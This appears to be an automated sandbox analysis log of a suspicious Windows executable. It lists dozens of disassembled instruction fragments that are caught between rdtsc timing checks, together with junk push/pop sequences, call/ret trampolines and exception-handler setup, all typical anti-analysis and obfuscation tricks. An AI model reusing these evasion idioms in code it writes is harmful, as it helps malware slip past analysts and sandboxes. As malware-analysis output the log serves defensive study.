Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B37B9C second address: B37C2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1848h], ebx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c ja 00007FA6CD35B91Ch 0x00000022 mov dword ptr [ebp+122D2D69h], edi 0x00000028 mov eax, dword ptr [ebp+122D0F31h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FA6CD35B918h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov edi, ecx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007FA6CD35B918h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 0000001Ch 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 jmp 00007FA6CD35B926h 0x0000006b nop 0x0000006c push ecx 0x0000006d push eax 0x0000006e push edx 0x0000006f jbe 00007FA6CD35B916h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3A92C second address: B3A9AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FA6CC859EEBh 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D2A7Ch], ebx 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b push edi 0x0000001c mov edi, dword ptr [ebp+122D3948h] 0x00000022 pop edx 0x00000023 mov cx, C2F8h 0x00000027 popad 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FA6CC859EC8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov di, si 0x00000047 xchg eax, esi 0x00000048 push edx 0x00000049 jmp 00007FA6CC859ECAh 0x0000004e pop edx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 pushad 0x00000054 popad 0x00000055 pop ecx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3A9AF second address: B3A9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3BA3B second address: B3BA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 mov edi, dword ptr [ebp+122D28EAh] 0x0000000b mov edi, dword ptr [ebp+122D2949h] 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+1245CBAEh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FA6CC859EC8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov bx, cx 0x00000038 mov edi, esi 0x0000003a mov dword ptr [ebp+12449416h], ebx 0x00000040 push eax 0x00000041 jng 00007FA6CC859ECEh 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B38B2F second address: B38B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B38B33 second address: B38B3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B38B3D second address: B38BBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b ja 00007FA6CD35B91Ah 0x00000011 nop 0x00000012 clc 0x00000013 push dword ptr fs:[00000000h] 0x0000001a or dword ptr [ebp+122D17ECh], eax 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 ja 00007FA6CD35B918h 0x0000002d mov eax, dword ptr [ebp+122D0EC9h] 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FA6CD35B918h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d sub ebx, dword ptr [ebp+122D38C8h] 0x00000053 mov di, ED10h 0x00000057 push FFFFFFFFh 0x00000059 jnc 00007FA6CD35B91Bh 0x0000005f push eax 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 pop ecx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CBE1 second address: B3CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D37C4h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FA6CC859EC8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jmp 00007FA6CC859ECAh 0x00000030 sbb edi, 0734E6C7h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FA6CC859EC8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 cmc 0x00000053 xchg eax, esi 0x00000054 jmp 00007FA6CC859ECEh 0x00000059 push eax 0x0000005a jnp 00007FA6CC859ED4h 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 pop esi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CDF7 second address: B3CE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B927h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CE13 second address: B3CE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CEEA second address: B3CEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B920h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CEFE second address: B3CF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CF04 second address: B3CF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3DD83 second address: B3DD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B44B66 second address: B44B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jg 00007FA6CD35B916h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B44B76 second address: B44B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A03B second address: B4A03F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1A7 second address: B4A1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1AD second address: B4A1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6CD35B91Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1C2 second address: B4A1C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1C6 second address: B4A1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1D2 second address: B4A1D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4EBCB second address: B4EBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA6CD35B922h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4EBEC second address: B4EBFD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6CC859EC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B501D5 second address: B501DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B57362 second address: B57375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA6CC859ECEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B57375 second address: B5738A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FA6CD35B91Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AED3F4 second address: AED3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5679D second address: B567AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA6CD35B91Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56A8C second address: B56A91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56A91 second address: B56AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B923h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6CD35B928h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56AC3 second address: B56AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56AC7 second address: B56ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FA6CD35B91Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B602F9 second address: B60305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B60305 second address: B60320 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6CD35B925h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B60320 second address: B60325 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5F00D second address: B5F011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5F011 second address: B5F02C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5F02C second address: B5F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5FA1F second address: B5FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5FA27 second address: B5FA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B64B8F second address: B64B9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6CC859EC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B64B9C second address: B64BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a pop esi 0x0000000b jmp 00007FA6CD35B91Dh 0x00000010 popad 0x00000011 push edi 0x00000012 jl 00007FA6CD35B91Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B64BBE second address: B64BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B267D5 second address: B267D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B267D9 second address: B26815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 js 00007FA6CC859ED1h 0x0000000e jmp 00007FA6CC859ECBh 0x00000013 nop 0x00000014 jo 00007FA6CC859ED0h 0x0000001a jmp 00007FA6CC859ECAh 0x0000001f lea eax, dword ptr [ebp+1247A528h] 0x00000025 or ecx, dword ptr [ebp+122D3AC0h] 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26815 second address: B26819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26819 second address: B2681D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2681D second address: B0C995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FA6CD35B918h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 xor dword ptr [ebp+122D181Fh], esi 0x00000018 call dword ptr [ebp+12448917h] 0x0000001e js 00007FA6CD35B932h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA6CD35B920h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26928 second address: B269C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007FA6CC859ECCh 0x0000000b js 00007FA6CC859EC6h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ecx, dword ptr [ebp+122D37CCh] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 jmp 00007FA6CC859ED8h 0x0000002e mov dword ptr [ebp+1247A580h], esp 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FA6CC859EC8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e cmp dword ptr [ebp+122D3A64h], 00000000h 0x00000055 jne 00007FA6CC859F8Eh 0x0000005b and ecx, dword ptr [ebp+122D3998h] 0x00000061 mov dword ptr [ebp+1245A39Ah], ebx 0x00000067 mov byte ptr [ebp+122D1813h], 00000047h 0x0000006e adc ecx, 009214A6h 0x00000074 mov eax, D49AA7D2h 0x00000079 pushad 0x0000007a mov di, BA24h 0x0000007e popad 0x0000007f nop 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 push edi 0x00000084 pop edi 0x00000085 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26E25 second address: B26E49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FA6CD35B916h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6CD35B922h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26E49 second address: B26E6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26E6A second address: B26E92 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CD35B916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FA6CD35B921h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26E92 second address: B26E98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26E98 second address: B26EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B927h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26EB3 second address: B26EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26EC5 second address: B26EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26EC9 second address: B26ED3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA6CC859EC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B27706 second address: B2770A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2770A second address: B27714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B27714 second address: B277A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007FA6CD35B916h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FA6CD35B918h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov cx, BC25h 0x00000034 push 0000001Eh 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FA6CD35B918h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 cmc 0x00000051 jmp 00007FA6CD35B920h 0x00000056 nop 0x00000057 jmp 00007FA6CD35B928h 0x0000005c push eax 0x0000005d pushad 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B27BF8 second address: B27BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B63EDA second address: B63EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B63EE0 second address: B63EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B63EE4 second address: B63F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6CD35B926h 0x00000010 jmp 00007FA6CD35B922h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B641F7 second address: B641FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B644CC second address: B644D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B644D0 second address: B644E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FA6CC859ECBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B644E6 second address: B644F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B644F1 second address: B644F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6465C second address: B64660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6A37C second address: B6A3B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA6CC859ED4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA6CC859ED4h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6A3B1 second address: B6A3BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6A6B5 second address: B6A6C6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6CC859ECCh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
